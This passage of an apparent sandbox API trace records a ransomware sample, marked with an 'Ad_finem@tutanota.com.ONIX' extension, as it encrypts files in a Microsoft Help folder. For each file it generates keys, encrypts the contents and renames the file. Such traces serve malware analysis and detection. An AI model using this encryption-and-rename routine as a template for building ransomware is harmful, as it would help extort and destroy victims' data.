nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.374] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.375] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x44faf8 [0122.375] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x442938 [0122.375] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.375] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.375] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.375] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.376] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x152, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.376] CloseHandle (hObject=0x4d0) returned 1 [0122.377] GetProcessHeap () returned 0x410000 [0122.377] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.377] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.379] GetProcessHeap () returned 0x410000 [0122.379] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.379] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf7d9300, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINPROJ.DEV.14.1033.hxn", cAlternateFileName="MSWINP~2.HXN")) returned 1 [0122.380] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.380] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.380] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16a, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.380] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.381] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.381] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.381] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.381] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.381] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 61 [0122.381] GetProcessHeap () returned 0x410000 [0122.381] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x44faf8 [0122.381] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" [0122.381] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.381] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=362) returned 1 [0122.381] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x16a [0122.381] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.381] GetProcessHeap () returned 0x410000 [0122.381] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.381] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.381] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.385] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.386] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.387] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16a) returned 0x442938 [0122.387] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16a) returned 0x46a0f0 [0122.387] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.387] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x16a, lpOverlapped=0x0) returned 1 [0122.387] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.387] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x16a, lpOverlapped=0x0) returned 1 [0122.388] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.388] CloseHandle (hObject=0x4d0) returned 1 [0122.389] GetProcessHeap () returned 0x410000 [0122.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.389] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.391] GetProcessHeap () returned 0x410000 [0122.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.391] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e6f0550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINWORD.14.1033.hxn", cAlternateFileName="MSWINW~1.HXN")) returned 1 [0122.391] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.392] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.392] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x152, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.392] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.393] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.393] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.393] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.393] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.393] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 57 [0122.393] GetProcessHeap () returned 0x410000 [0122.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0122.393] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" [0122.393] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.393] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=338) returned 1 [0122.393] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x152 [0122.393] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.393] GetProcessHeap () returned 0x410000 [0122.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.393] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.393] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.397] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.399] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x44faf8 [0122.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x442938 [0122.401] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.401] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.401] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.401] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.402] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x152, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.402] CloseHandle (hObject=0x4d0) returned 1 [0122.403] GetProcessHeap () returned 0x410000 [0122.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.403] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.405] GetProcessHeap () returned 0x410000 [0122.405] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.405] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e6f0550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINWORD.DEV.14.1033.hxn", cAlternateFileName="MSWINW~2.HXN")) returned 1 [0122.405] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.405] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.405] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16a, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.406] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.406] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.406] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.406] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.406] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.406] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 61 [0122.406] GetProcessHeap () returned 0x410000 [0122.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x44faf8 [0122.406] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" [0122.406] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.406] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=362) returned 1 [0122.406] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x16a [0122.406] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.406] GetProcessHeap () returned 0x410000 [0122.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.406] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.406] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.414] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.415] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16a) returned 0x442938 [0122.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16a) returned 0x46a0f0 [0122.416] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.416] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x16a, lpOverlapped=0x0) returned 1 [0122.416] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.416] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x16a, lpOverlapped=0x0) returned 1 [0122.417] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.417] CloseHandle (hObject=0x4d0) returned 1 [0122.417] GetProcessHeap () returned 0x410000 [0122.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.417] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.420] GetProcessHeap () returned 0x410000 [0122.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.420] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x21dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nslist.hxl", cAlternateFileName="")) returned 1 [0122.420] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.421] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.421] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x21dc, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.421] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.421] ReadFile (in: hFile=0x4d0, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0122.423] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.423] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.423] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.423] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.423] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl", dwFileAttributes=0x80) returned 1 [0122.423] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl") returned 45 [0122.423] GetProcessHeap () returned 0x410000 [0122.423] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xca) returned 0x477600 [0122.423] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl") returned="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" [0122.423] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.423] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=8668) returned 1 [0122.423] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x21dc [0122.423] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.423] GetProcessHeap () returned 0x410000 [0122.423] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 